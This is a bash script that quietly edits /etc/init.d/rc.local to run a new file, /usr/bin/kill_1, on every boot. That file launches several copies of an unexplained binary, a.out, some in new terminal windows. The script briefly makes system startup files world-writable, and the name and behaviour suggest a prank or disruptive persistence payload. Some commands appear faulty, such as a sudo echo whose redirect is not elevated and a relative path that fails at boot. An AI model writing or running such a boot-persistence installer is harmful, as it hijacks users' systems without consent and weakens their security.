#!/usr/bin/env bash
sudo mv /etc/init.d/rc.local /etc/init.d/rc.local.back;
sudo touch /etc/init.d/rc.local;
sudo chmod 777 /etc/init.d/rc.local;
sudo head -1 /etc/init.d/rc.local.back > /etc/init.d/rc.local;
sudo echo "/usr/bin/kill_1" >> /etc/init.d/rc.local;
sudo tail +2 /etc/init.d/rc.local.back >> /etc/init.d/rc.local;
sudo chmod 755 /etc/init.d/rc.local;
sudo rm /etc/init.d/rc.local.back;
sudo touch /usr/bin/kill_1;
sudo chmod 777 /usr/bin/kill_1;
echo '#!/usr/bin/env bash
wget -q http://google.com/index.html

if [ $? -eq 0 ]; then
    for i in {1..3}
do
	./a.out &
	gnome-terminal -- ./a.out &
done
else
    sleep 10m
    for i in {1..3}
do
	./a.out &
	gnome-terminal -- ./a.out &
done
fi' > /usr/bin/kill_1;
sudo chmod 755 /usr/bin/kill_1;
sudo cp ./a.out /usr/bin/;
sudo chmod 755 /usr/bin/./a.out;
